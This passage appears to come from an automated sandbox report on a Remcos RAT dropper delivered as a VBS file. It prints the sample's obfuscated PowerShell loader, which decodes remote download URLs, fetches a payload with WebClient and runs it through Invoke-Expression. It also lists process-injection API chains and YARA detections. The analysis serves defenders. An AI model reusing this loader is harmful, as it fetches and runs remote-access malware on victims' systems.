TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,4_2_004180EF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,4_2_004132D2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,4_2_0041BB09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,4_2_0041BB35
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,7_2_0040DD85
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00401806 NtdllDefWindowProc_W,7_2_00401806
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004018C0 NtdllDefWindowProc_W,7_2_004018C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004016FD NtdllDefWindowProc_A,8_2_004016FD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004017B7 NtdllDefWindowProc_A,8_2_004017B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00402CAC NtdllDefWindowProc_A,9_2_00402CAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00402D66 NtdllDefWindowProc_A,9_2_00402D66
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_004167B4
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848FD2CFC2_2_00007FF848FD2CFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043E0CC4_2_0043E0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041F0FA4_2_0041F0FA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004541594_2_00454159
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004381684_2_00438168
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004461F04_2_004461F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043E2FB4_2_0043E2FB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0045332B4_2_0045332B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0042739D4_2_0042739D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004374E64_2_004374E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043E5584_2_0043E558
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004387704_2_00438770
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004378FE4_2_004378FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_004339464_2_00433946
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0044D9C94_2_0044D9C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00427A464_2_00427A46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0041DB624_2_0041DB62
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00427BAF4_2_00427BAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00437D334_2_00437D33
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00435E5E4_2_00435E5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00426E0E4_2_00426E0E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_0043DE9D4_2_0043DE9D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00413FCA4_2_00413FCA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00436FEA4_2_00436FEA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_100171944_2_10017194
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_1000B5C14_2_1000B5C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044B0407_2_0044B040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043610D7_2_0043610D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004473107_2_00447310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044A4907_2_0044A490
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040755A7_2_0040755A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043C5607_2_0043C560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044B6107_2_0044B610
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044D6C07_2_0044D6C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004476F07_2_004476F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044B8707_2_0044B870
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044081D7_2_0044081D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004149577_2_00414957
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004079EE7_2_004079EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00407AEB7_2_00407AEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044AA807_2_0044AA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00412AA97_2_00412AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404B747_2_00404B74
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404B037_2_00404B03
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0044BBD87_2_0044BBD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404BE57_2_00404BE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00404C767_2_00404C76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00415CFE7_2_00415CFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00416D727_2_00416D72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00446D307_2_00446D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00446D8B7_2_00446D8B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00406E8F7_2_00406E8F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004050388_2_00405038
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041208C8_2_0041208C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004050A98_2_004050A9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040511A8_2_0040511A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043C13A8_2_0043C13A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004051AB8_2_004051AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004493008_2_00449300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040D3228_2_0040D322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044A4F08_2_0044A4F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043A5AB8_2_0043A5AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004136318_2_00413631
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004466908_2_00446690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044A7308_2_0044A730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004398D88_2_004398D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004498E08_2_004498E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044A8868_2_0044A886
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0043DA098_2_0043DA09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00438D5E8_2_00438D5E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00449ED08_2_00449ED0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041FE838_2_0041FE83
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00430F548_2_00430F54
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004050C29_2_004050C2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004014AB9_2_004014AB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004051339_2_00405133
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004051A49_2_004051A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004012469_2_00401246
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040CA469_2_0040CA46
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004052359_2_00405235
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004032C89_2_004032C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004016899_2_00401689
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00402F609_2_00402F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E10 appears 54 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434770 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 34 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                  Source: createdthingstobefrankwithmeeverywhere.gIF.vbsInitial sample: Strings found which are bigger than 50
                  Source: amsi32_7244.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: amsi32_7632.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 7244, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 7632, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@25/16@4/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,7_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00417952
